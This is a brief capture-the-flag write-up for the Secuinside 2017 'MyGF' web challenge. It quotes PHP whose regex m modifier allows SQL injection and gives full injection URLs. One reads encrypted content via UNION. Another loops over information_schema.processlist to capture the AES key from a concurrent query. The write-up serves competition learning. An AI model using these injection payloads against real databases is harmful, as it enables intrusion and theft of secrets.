WriteUp

Secuinside2017 MyGF write-up

else if($page == “read”){
$col = addslashes($_GET[‘col’]);
$col = preg_match(“/^no$/ismU”,$col) ? $col : “”;
There is SQL Injection vuln at read page because of m modifier

We can get encrypted content like this.
http://ip/?page=read&col=no%0a=0%20union%20select%201,content,3,4%20from%20board%20where%20no=1%23&no=1‚Äč

We need aeskey but mysql user board can’t access aeskey database.

$contentdec = mysql_fetch_array(mysql_query(“select *,
aes_decrypt(unhex(content),unhex(‘”.$aeskey[‘aeskey’].”‘)) as plain
from(select * from board.board join member.members) as a where no='”.$no.”‘”));
At line 139, board(mysql user) query aeskey as plain text.

Every mysql query viewed at information_schema.processlist.info
If we select it repeatedly, we can get aeskey.
http://ip/?page=read&col=no%0a=0%20union%20select%201,1,3,@a:=0x3a3a%20union%20select%201,2,3,@tmp:=0x20%20union%20select%201,3,3,benchmark(200000,(@tmp:=%20(%20select%20Group_concat(info)%20from%20information_schema.processlist%20where%20info%20not%20like%200x254d49544d5f53514c495f50574e25%20
or%20sleep(0)/*MITM_SQLI_PWN*/))^(if((@tmp!=0x00)%26%26(@a%20not%20like%20concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)),@a:=concat(@a,
replace(@tmp,0x0a,0x5c6e),0x3a3a),0)))%20union%20select%201,@a,3,4%20limit%203,1%23&no=1

Leave a Reply

Your email address will not be published. Required fields are marked *